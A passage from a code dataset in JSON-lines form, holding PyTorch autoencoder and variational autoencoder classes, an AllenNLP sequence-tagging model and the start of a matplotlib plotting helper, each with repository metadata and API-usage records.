3, padding=1, stride=(2, 2)), # 14x14\n nn.ReLU(inplace=True),\n nn.Conv2d(8, 16, 3, padding=1, stride=(2, 2)), # 7x7\n nn.ReLU(inplace=True), # 64x4x4\n nn.Conv2d(16, 32, 3, padding=1, stride=(2, 2)), # 4x4\n nn.ReLU(inplace=True), # 64x4x4\n nn.Flatten(),\n nn.Linear(32 * 16, 8 * 16),\n nn.ReLU(inplace=True),\n nn.Linear(8 * 16, n_bottleneck),\n nn.ReLU(inplace=True),\n ]\n decoder_layers = [\n nn.Linear(n_bottleneck, 8 * 16),\n nn.ReLU(inplace=True),\n nn.Linear(8 * 16, 32 * 16),\n nn.ReLU(inplace=True),\n Reshape(-1, 32, 4, 4),\n nn.ConvTranspose2d(32, 16, 3, stride=2, padding=1),\n nn.ReLU(inplace=True),\n nn.ConvTranspose2d(16, 8, 4, stride=2, padding=1),\n nn.ReLU(inplace=True),\n nn.ConvTranspose2d(8, n_channel, 4, stride=2, padding=1),\n nn.Sigmoid(),\n ]\n return encoder_layers, decoder_layers\n\n\nclass AutoEncoderBase(ModelBase[AutoEncoderConfig], Generic[ImageT]):\n image_type: Type[ImageT]\n encoder_module: nn.Module\n decoder_module: nn.Module\n n_pixel: int\n\n @abstractmethod\n def loss(self, sample: torch.Tensor) -> LossDict:\n pass\n\n @abstractmethod\n def encode(self, inp: torch.Tensor) -> torch.Tensor:\n \"\"\"Must be deterministic\"\"\"\n\n @abstractmethod\n def decode(self, inp: torch.Tensor) -> torch.Tensor:\n \"\"\"Must be deterministic\"\"\"\n\n @abstractmethod\n def compute_reconstruction_loss(self, img: ImageT) -> float:\n \"\"\"Must be deterministic\"\"\"\n\n def check_network_input(self, inp: torch.Tensor):\n assert inp.ndim == 4\n assert list(inp.shape[2:]) == [self.n_pixel, self.n_pixel]\n assert self.image_type.channel() == inp.shape[1], \"channel mismatch\"\n\n def forward(self, input: torch.Tensor) -> torch.Tensor:\n self.check_network_input(input)\n return self.decode(self.encode(input))\n\n def channel(self) -> int:\n return self.image_type.channel()\n\n\nclass AutoEncoder(AutoEncoderBase[ImageT]):\n def loss(self, sample: torch.Tensor) -> LossDict:\n self.check_network_input(sample)\n f_loss = nn.MSELoss()\n reconstructed = self.forward(sample)\n loss_value = f_loss(sample, reconstructed)\n return LossDict({\"reconstruction\": loss_value})\n\n def encode(self, inp: torch.Tensor) -> torch.Tensor:\n return self.encoder_module(inp)\n\n def decode(self, inp: torch.Tensor) -> torch.Tensor:\n return self.decoder_module(inp)\n\n def compute_reconstruction_loss(self, img: ImageT) -> float:\n tens = img.to_tensor().unsqueeze(dim=0)\n tens_reconst = nn.Sequential(self.encoder_module, self.decoder_module)(tens)\n loss = nn.MSELoss()(tens_reconst, tens)\n return loss.item()\n\n def _setup_from_config(self, config: AutoEncoderConfig):\n self.image_type = config.image_type # type: ignore\n n_pixel = config.n_pixel\n self.n_pixel = n_pixel\n encoder_layers, decoder_layers = create_encoder_decoder_layers(\n self.channel(), config.n_pixel, config.n_bottleneck\n )\n self.encoder_module = nn.Sequential(*encoder_layers)\n self.decoder_module = nn.Sequential(*decoder_layers)\n\n\nclass VariationalAutoEncoder(AutoEncoderBase[ImageT]):\n dense_mean: nn.Module\n dense_var: nn.Module\n\n def loss(self, sample: torch.Tensor) -> LossDict:\n self.check_network_input(sample)\n\n encoded = self.encoder_module(sample)\n mu = self.dense_mean(encoded)\n logvar = self.dense_var(encoded)\n z = self.reparameterize(mu, logvar)\n reconstructed = self.decoder_module(z)\n\n weight = 1e-1 * self.config.n_bottleneck / np.prod(sample.shape)\n kld_loss = (\n torch.mean(-0.5 * torch.sum(1 + logvar - mu**2 - logvar.exp(), dim=1), dim=0) * weight\n )\n loss_value = nn.MSELoss()(sample, reconstructed)\n return LossDict({\"reconstruction\": loss_value, \"kld\": kld_loss})\n\n def encode(self, input: torch.Tensor) -> torch.Tensor:\n return nn.Sequential(self.encoder_module, self.dense_mean)(input)\n\n def decode(self, input: torch.Tensor) -> torch.Tensor:\n return self.decoder_module(input)\n\n def compute_reconstruction_loss(self, img: ImageT) -> float:\n tens = img.to_tensor().unsqueeze(dim=0)\n tens_reconst = nn.Sequential(self.encoder_module, self.dense_mean, self.decoder_module)(\n tens\n )\n loss = nn.MSELoss()(tens_reconst, tens)\n return loss.item()\n\n def reparameterize(self, mu: torch.Tensor, logvar: torch.Tensor) -> torch.Tensor:\n std = torch.exp(0.5 * logvar)\n eps = torch.randn_like(std)\n return eps * std + mu\n\n def _setup_from_config(self, config: AutoEncoderConfig):\n self.image_type = config.image_type # type: ignore\n n_pixel = config.n_pixel\n encoder_layers, decoder_layers = create_encoder_decoder_layers(\n self.channel(), config.n_pixel, config.n_bottleneck\n )\n encoder_layers.pop() # remove relu\n encoder_layers.pop() # remove dense\n\n encoder_last_dense: nn.Linear = encoder_layers[-2] # type: ignore\n out_dim = encoder_last_dense.out_features\n\n self.encoder_module = nn.Sequential(*encoder_layers)\n self.decoder_module = nn.Sequential(*decoder_layers)\n self.dense_mean = nn.Linear(out_dim, config.n_bottleneck)\n self.dense_var = nn.Linear(out_dim, config.n_bottleneck)\n self.n_pixel = n_pixel\n\n def get_latent_axis_images(\n self, axis: int, b_min: float = -2.0, b_max: float = 2.0, n_sample: int = 20\n ) -> List[ImageT]:\n # create samples from latent space walking through an axis\n samples = torch.zeros(n_sample, self.config.n_bottleneck)\n for i, val in enumerate(np.linspace(b_min, b_max, n_sample)):\n samples[i, axis] = val\n\n # create images\n tensor_images = self.decoder_module(samples)\n images = [self.image_type.from_tensor(tensor_image) for tensor_image in tensor_images]\n return images\n", "repo_name": "HiroIshida/mohou", "sub_path": "mohou/model/autoencoder.py", "file_name": "autoencoder.py", "file_ext": "py", "file_size_in_byte": 10331, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 12, "dataset": "github-code", "pt": "61", "api": [{"api_name": "mohou.model.common.ModelConfigBase", "line_number": 14, "usage_type": "name"}, {"api_name": "typing.Type", "line_number": 15, "usage_type": "name"}, {"api_name": "mohou.types.ImageBase", "line_number": 15, "usage_type": "name"}, {"api_name": "dataclasses.dataclass", "line_number": 13, "usage_type": "name"}, {"api_name": "torch.nn.Module", "line_number": 24, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 24, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 40, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 40, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 41, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 41, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 42, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 42, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 43, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 43, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 44, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 44, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 45, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 45, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 46, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 46, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 47, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 47, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 48, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 48, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 49, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 49, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 50, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 50, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 51, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 51, "usage_type": "name"}, {"api_name": "torch.nn.Flatten", "line_number": 52, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 52, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 53, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 53, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 54, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 54, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 55, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 55, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 56, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 56, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 59, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 59, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 60, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 60, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 61, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 61, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 62, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 62, "usage_type": "name"}, {"api_name": "torch.nn.ConvTranspose2d", "line_number": 64, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 64, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 65, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 65, "usage_type": "name"}, {"api_name": "torch.nn.ConvTranspose2d", "line_number": 66, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 66, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 67, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 67, "usage_type": "name"}, {"api_name": "torch.nn.ConvTranspose2d", "line_number": 68, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 68, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 69, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 69, "usage_type": "name"}, {"api_name": "torch.nn.ConvTranspose2d", "line_number": 70, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 70, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 71, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 71, "usage_type": "name"}, {"api_name": "torch.nn.ConvTranspose2d", "line_number": 72, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 72, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 73, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 73, "usage_type": "name"}, {"api_name": "torch.nn.ConvTranspose2d", "line_number": 74, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 74, "usage_type": "name"}, {"api_name": "torch.nn.Sigmoid", "line_number": 75, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 75, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 79, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 79, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 80, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 80, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 81, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 81, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 82, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 82, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 83, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 83, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 84, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 84, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 85, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 85, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 86, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 86, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 87, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 87, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 88, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 88, "usage_type": "name"}, {"api_name": "torch.nn.Flatten", "line_number": 89, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 89, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 90, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 90, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 91, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 91, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 92, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 92, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 93, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 93, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 96, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 96, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 97, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 97, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 98, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 98, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 99, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 99, "usage_type": "name"}, {"api_name": "torch.nn.ConvTranspose2d", "line_number": 101, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 101, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 102, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 102, "usage_type": "name"}, {"api_name": "torch.nn.ConvTranspose2d", "line_number": 103, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 103, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 104, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 104, "usage_type": "name"}, {"api_name": "torch.nn.ConvTranspose2d", "line_number": 105, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 105, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 106, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 106, "usage_type": "name"}, {"api_name": "torch.nn.ConvTranspose2d", "line_number": 107, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 107, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 108, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 108, "usage_type": "name"}, {"api_name": "torch.nn.ConvTranspose2d", "line_number": 109, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 109, "usage_type": "name"}, {"api_name": "torch.nn.Sigmoid", "line_number": 110, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 110, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 114, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 114, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 115, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 115, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 116, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 116, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 117, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 117, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 118, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 118, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 119, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 119, "usage_type": "name"}, {"api_name": "torch.nn.Flatten", "line_number": 120, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 120, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 121, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 121, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 122, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 122, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 123, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 123, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 124, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 124, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 127, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 127, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 128, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 128, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 129, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 129, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 130, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 130, "usage_type": "name"}, {"api_name": "torch.nn.ConvTranspose2d", "line_number": 132, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 132, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 133, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 133, "usage_type": "name"}, {"api_name": "torch.nn.ConvTranspose2d", "line_number": 134, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 134, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 135, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 135, "usage_type": "name"}, {"api_name": "torch.nn.ConvTranspose2d", "line_number": 136, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 136, "usage_type": "name"}, {"api_name": "torch.nn.Sigmoid", "line_number": 137, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 137, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 35, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 35, "usage_type": "name"}, {"api_name": "torch.nn.Module", "line_number": 35, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 35, "usage_type": "name"}, {"api_name": "mohou.model.common.ModelBase", "line_number": 142, "usage_type": "name"}, {"api_name": "typing.Generic", "line_number": 142, "usage_type": "name"}, {"api_name": "mohou.types.ImageT", "line_number": 142, "usage_type": "name"}, {"api_name": "typing.Type", "line_number": 143, "usage_type": "name"}, {"api_name": "mohou.types.ImageT", "line_number": 143, "usage_type": "name"}, {"api_name": "torch.nn.Module", "line_number": 144, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 144, "usage_type": "name"}, {"api_name": "torch.nn.Module", "line_number": 145, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 145, "usage_type": "name"}, {"api_name": "torch.Tensor", "line_number": 149, "usage_type": "attribute"}, {"api_name": "abc.abstractmethod", "line_number": 148, "usage_type": "name"}, {"api_name": "mohou.model.common.LossDict", "line_number": 149, "usage_type": "name"}, {"api_name": "torch.Tensor", "line_number": 153, "usage_type": "attribute"}, {"api_name": "abc.abstractmethod", "line_number": 152, "usage_type": "name"}, {"api_name": "torch.Tensor", "line_number": 157, "usage_type": "attribute"}, {"api_name": "abc.abstractmethod", "line_number": 156, "usage_type": "name"}, {"api_name": "mohou.types.ImageT", "line_number": 161, "usage_type": "name"}, {"api_name": "abc.abstractmethod", "line_number": 160, "usage_type": "name"}, {"api_name": "torch.Tensor", "line_number": 164, "usage_type": "attribute"}, {"api_name": "torch.Tensor", "line_number": 169, "usage_type": "attribute"}, {"api_name": "mohou.types.ImageT", "line_number": 177, "usage_type": "name"}, {"api_name": "torch.Tensor", "line_number": 178, "usage_type": "attribute"}, {"api_name": "torch.nn.MSELoss", "line_number": 180, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 180, "usage_type": "name"}, {"api_name": "mohou.model.common.LossDict", "line_number": 183, "usage_type": "call"}, {"api_name": "mohou.model.common.LossDict", "line_number": 178, "usage_type": "name"}, {"api_name": "torch.Tensor", "line_number": 185, "usage_type": "attribute"}, {"api_name": "torch.Tensor", "line_number": 188, "usage_type": "attribute"}, {"api_name": "mohou.types.ImageT", "line_number": 191, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 193, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 193, "usage_type": "name"}, {"api_name": "torch.nn.MSELoss", "line_number": 194, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 194, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 204, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 204, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 205, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 205, "usage_type": "name"}, {"api_name": "mohou.types.ImageT", "line_number": 208, "usage_type": "name"}, {"api_name": "torch.nn.Module", "line_number": 209, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 209, "usage_type": "name"}, {"api_name": "torch.nn.Module", "line_number": 210, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 210, "usage_type": "name"}, {"api_name": "torch.Tensor", "line_number": 212, "usage_type": "attribute"}, {"api_name": "numpy.prod", "line_number": 221, "usage_type": "call"}, {"api_name": "torch.mean", "line_number": 223, "usage_type": "call"}, {"api_name": "torch.sum", "line_number": 223, "usage_type": "call"}, {"api_name": "torch.nn.MSELoss", "line_number": 225, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 225, "usage_type": "name"}, {"api_name": "mohou.model.common.LossDict", "line_number": 226, "usage_type": "call"}, {"api_name": "mohou.model.common.LossDict", "line_number": 212, "usage_type": "name"}, {"api_name": "torch.Tensor", "line_number": 228, "usage_type": "attribute"}, {"api_name": "torch.nn.Sequential", "line_number": 229, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 229, "usage_type": "name"}, {"api_name": "torch.Tensor", "line_number": 231, "usage_type": "attribute"}, {"api_name": "mohou.types.ImageT", "line_number": 234, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 236, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 236, "usage_type": "name"}, {"api_name": "torch.nn.MSELoss", "line_number": 239, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 239, "usage_type": "name"}, {"api_name": "torch.Tensor", "line_number": 242, "usage_type": "attribute"}, {"api_name": "torch.exp", "line_number": 243, "usage_type": "call"}, {"api_name": "torch.randn_like", "line_number": 244, "usage_type": "call"}, {"api_name": "torch.nn.Linear", "line_number": 256, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 256, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 259, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 259, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 260, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 260, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 261, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 261, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 262, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 262, "usage_type": "name"}, {"api_name": "torch.zeros", "line_number": 269, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 270, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 267, "usage_type": "name"}, {"api_name": "mohou.types.ImageT", "line_number": 267, "usage_type": "name"}]} +{"seq_id": "35802112679", "text": "\nfrom typing import Dict\n\nimport torch\nfrom torch.nn import CrossEntropyLoss\nfrom torch.nn import Sequential\nfrom torch import nn\n\n\nfrom allennlp.models import Model\nfrom allennlp.data.vocabulary import Vocabulary\nfrom allennlp.modules.text_field_embedders import TextFieldEmbedder\nfrom allennlp.modules.seq2seq_encoders import Seq2SeqEncoder\nfrom allennlp.nn.util import get_text_field_mask\nfrom allennlp.training.metrics import CategoricalAccuracy\nfrom metrics.loss import SequenceLoss\nfrom torch.nn import SmoothL1Loss, HingeEmbeddingLoss, CrossEntropyLoss\nfrom metrics.confidence import Confidence\nfrom allennlp.nn.util import sequence_cross_entropy_with_logits\n\n\n@Model.register(\"tagger\")\nclass BaseSequenceTagger(Model):\n \"\"\"\n a model for sequence tagging\n \"\"\"\n\n def __init__(self,\n word_embeddings: TextFieldEmbedder,\n encoder: Seq2SeqEncoder,\n vocab: Vocabulary,\n dropout: float = 0.5\n ) -> None:\n \"\"\"\n\n :param word_embeddings: the embeddings to start with\n :param encoder: the seq2seq transformer of embeddings can be LSTM for example\n :param vocab: dataset input and output vocabulary\n \"\"\"\n\n super(BaseSequenceTagger, self).__init__(vocab)\n\n self.word_embeddings = word_embeddings\n\n self.encoder = encoder\n\n # Representations this is the layer that is just above the last layer and the non linearity (hidden[-1])\n # is is used to calculate FID score, and similar metrics that's why we expose it into self.representations\n # class attribute\n self.representations = self.encoder\n\n self.hidden2tags = torch.nn.Linear(in_features=encoder.get_output_dim(),\n out_features=vocab.get_vocab_size('pos'))\n\n # self.accuracy = CategoricalAccuracy()\n self.criterion = sequence_cross_entropy_with_logits\n\n self.metrics = {\n \"accuracy\": CategoricalAccuracy(),\n # \"huber-loss\": Loss(SmoothL1Loss()),\n \"confidence\": Confidence()\n }\n\n self.dropout = nn.Dropout(dropout)\n\n def forward(self,\n sentence: Dict[str, torch.Tensor],\n label: torch.Tensor = None, **kwargs) -> Dict[str, torch.Tensor]:\n\n words = sentence\n mask = get_text_field_mask(words)\n\n embeddings = self.word_embeddings(words)\n encoder_out = self.encoder(embeddings, mask)\n logits = self.hidden2tags(self.dropout(encoder_out))\n\n output = {\"logits\": logits,\n \"probs\": torch.nn.functional.softmax(logits, dim=-1),\n \"class\": torch.argmax(torch.nn.functional.softmax(logits, dim=-1), dim=-1)\n }\n\n if label is not None:\n\n output[\"loss\"] = self.criterion(logits, label,\n weights=torch.ones_like(label))\n\n for metric_name, metric in self.metrics.items():\n\n metric(logits, label)\n\n return output\n\n def get_metrics(self, reset: bool = False) -> Dict[str, float]:\n\n metrics = {}\n\n for metric_name, metric in self.metrics.items():\n\n metrics[metric_name] = metric.get_metric(reset)\n\n return metrics\n", "repo_name": "naver/domainshift-prediction", "sub_path": "models/base/basetagger.py", "file_name": "basetagger.py", "file_ext": "py", "file_size_in_byte": 3299, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 11, "dataset": "github-code", "pt": "61", "api": [{"api_name": "allennlp.models.Model", "line_number": 23, "usage_type": "name"}, {"api_name": "allennlp.modules.text_field_embedders.TextFieldEmbedder", "line_number": 29, "usage_type": "name"}, {"api_name": "allennlp.modules.seq2seq_encoders.Seq2SeqEncoder", "line_number": 30, "usage_type": "name"}, {"api_name": "allennlp.data.vocabulary.Vocabulary", "line_number": 31, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 52, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 52, "usage_type": "attribute"}, {"api_name": "allennlp.nn.util.sequence_cross_entropy_with_logits", "line_number": 56, "usage_type": "name"}, {"api_name": "allennlp.training.metrics.CategoricalAccuracy", "line_number": 59, "usage_type": "call"}, {"api_name": "metrics.confidence.Confidence", "line_number": 61, "usage_type": "call"}, {"api_name": "torch.nn.Dropout", "line_number": 64, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 64, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 67, "usage_type": "name"}, {"api_name": "torch.Tensor", "line_number": 67, "usage_type": "attribute"}, {"api_name": "torch.Tensor", "line_number": 68, "usage_type": "attribute"}, {"api_name": "allennlp.nn.util.get_text_field_mask", "line_number": 71, "usage_type": "call"}, {"api_name": "torch.nn.functional.softmax", "line_number": 78, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 78, "usage_type": "attribute"}, {"api_name": "torch.argmax", "line_number": 79, "usage_type": "call"}, {"api_name": "torch.nn.functional.softmax", "line_number": 79, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 79, "usage_type": "attribute"}, {"api_name": "torch.ones_like", "line_number": 85, "usage_type": "call"}, {"api_name": "typing.Dict", "line_number": 68, "usage_type": "name"}, {"api_name": "metrics.loss", "line_number": 95, "usage_type": "name"}, {"api_name": "metrics.loss", "line_number": 99, "usage_type": "name"}, {"api_name": "metrics.loss", "line_number": 101, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 93, "usage_type": "name"}, {"api_name": "allennlp.models.Model.register", "line_number": 22, "usage_type": "call"}, {"api_name": "allennlp.models.Model", "line_number": 22, "usage_type": "name"}]} +{"seq_id": "25986663268", "text": "from __future__ import print_function, division\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom matplotlib.patches import Rectangle\nfrom mpl_toolkits.axes_grid1 import make_axes_locatable\n\n\ndef tableau20_colors():\n \"\"\"Good set of colors for plotting\n\n Returns:\n list: list of r,g,b color values\n \"\"\"\n tableau20 = [(31, 119, 180), (174, 199, 232), (255, 127, 14), (255, 187, 120),\n (44, 160, 44), (152, 223, 138), (214, 39, 40), (255, 152, 150),\n (148, 103, 189), (197, 176, 213), (140, 86, 75), (196, 156, 148),\n (227, 119, 194), (247, 182, 210), (127, 127, 127), (199, 199, 199),\n (188, 189, 34), (219, 219, 141), (23, 190, 207), (158, 218, 229)]\n for i in range(len(tableau20)):\n r, g, b = tableau20[i]\n tableau20[i] = (r / 255., g / 255., b / 255.)\n\n return tableau20\n\n\ndef my_hist(ax, data, bins=None, horizontal=False):\n \"\"\"Custom histogram function for plotting multinest output\n\n Args:\n ax (matplotlib.axes.Axes): axes to plot with\n data (np.ndarray): array of values to histogram\n bins (int, optional): number of bins in histogram\n horizontal (bool): histogram is horizontal if True\n\n Returns:\n np.ndarray: bin edges for the histogram\n \"\"\"\n if bins is not None:\n hist, bins = np.histogram(data, density=True, 